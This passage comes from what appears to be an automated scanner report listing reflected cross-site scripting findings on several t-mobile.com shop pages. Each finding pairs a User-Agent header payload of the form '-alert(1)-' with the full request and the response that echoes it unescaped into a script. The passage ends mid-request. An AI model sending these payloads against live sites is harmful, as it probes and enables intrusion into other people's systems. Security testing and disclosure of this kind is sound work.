1.254. http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/shop/Phones/cell-phone-detail.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74b4d'-alert(1)-'a53cba94ddd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/Phones/cell-phone-detail.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)74b4d'-alert(1)-'a53cba94ddd
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a02%3a09+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:02:09 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:02:09 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:02:09 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Set-Cookie: TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$; domain=.t-mobile.com; expires=Sun, 20-Mar-2011 14:07:09 GMT; path=/
Date: Sun, 20 Mar 2011 14:02:09 GMT
Connection: close
Content-Length: 286173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)74b4d'-alert(1)-'a53cba94ddd');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.255. http://www.t-mobile.com/shop/addons/Accessories/Default.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/shop/addons/Accessories/Default.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfd1f'-alert(1)-'10e06071599 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/addons/Accessories/Default.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cfd1f'-alert(1)-'10e06071599
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a01%3a23+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:01:23 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:23 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:23 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862&SELECTEDDEVICE=00000000-0000-0000-0000-000000000000; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:01:23 GMT
Connection: close
Content-Length: 92854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cfd1f'-alert(1)-'10e06071599');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.256. http://www.t-mobile.com/shop/addons/Services/information.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/shop/addons/Services/information.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 215a2'-alert(1)-'4237b3c9efa was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/addons/Services/information.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)215a2'-alert(1)-'4237b3c9efa
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a01%3a47+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:01:47 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:47 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:47 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:01:47 GMT
Connection: close
Content-Length: 53996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)215a2'-alert(1)-'4237b3c9efa');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.257. http://www.t-mobile.com/shop/phones/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/shop/phones/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 214f3'-alert(1)-'d5ed2586768 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/phones/ HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)214f3'-alert(1)-'d5ed2586768
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a01%3a52+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:01:52 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:52 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:52 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Set-Cookie: TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$; domain=.t-mobile.com; expires=Sun, 20-Mar-2011 14:06:52 GMT; path=/
Date: Sun, 20 Mar 2011 14:01:52 GMT
Connection: close
Content-Length: 286174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)214f3'-alert(1)-'d5ed2586768');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.258. http://www.t-mobile.com/shop/phones/Default.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/shop/phones/Default.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c904'-alert(1)-'9db52b8040e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/phones/Default.aspx HTTP/1.1
Host: www.t-mobile.com
Proxy-Connection: keep-alive
Referer: http://t-mobile-coverage.t-mobile.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.168c904'-alert(1)-'9db52b8040e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; cmTPSet=Y; TMobileSession=WT=&DCS=; mr_referredVisitor=0; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300616306182:ss=1300616298452; mbox=PC#1300624507874-511379.17#1301836707|check#true#1300627167|session#1300627094627-816279#1300628967; fsr.a=1300627109957; 53643872-VID=44502044936234; 53643872-SKEY=692143054958629433; HumanClickSiteContainerID_53643872=STANDALONE; TMobileSpanish=IsSpanishUser=false

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=bbd8af55-dec8-4577-8bc0-38934d49fca9; domain=.t-mobile.com; path=/
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+1%3a37%3a28+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 13:37:28 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 13:37:28 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 13:37:28 GMT; path=/
Set-Cookie: TMobileSegmentation=UserId=043d9dcf-c3f1-46c8-9b2f-3ad28b7c682a; domain=.t-mobile.com; expires=Fri, 16-Sep-2011 13:37:28 GMT; path=/
Set-Cookie: TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$; domain=.t-mobile.com; expires=Sun, 20-Mar-2011 13:42:28 GMT; path=/
Date: Sun, 20 Mar 2011 13:37:27 GMT
Content-Length: 286245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
dVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.168c904'-alert(1)-'9db52b8040e');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.259. http://www.t-mobile.com/shop/phones/prepaid.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/shop/phones/prepaid.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33edd'-alert(1)-'033a4d69c70 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/phones/prepaid.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)33edd'-alert(1)-'033a4d69c70
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a01%3a58+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:01:58 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:58 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:58 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:01:57 GMT
Connection: close
Content-Length: 298860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)33edd'-alert(1)-'033a4d69c70');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.260. http://www.t-mobile.com/shop/plans/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/shop/plans/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc32'-alert(1)-'57fd293ebfe was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/plans/ HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7dc32'-alert(1)-'57fd293ebfe
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; 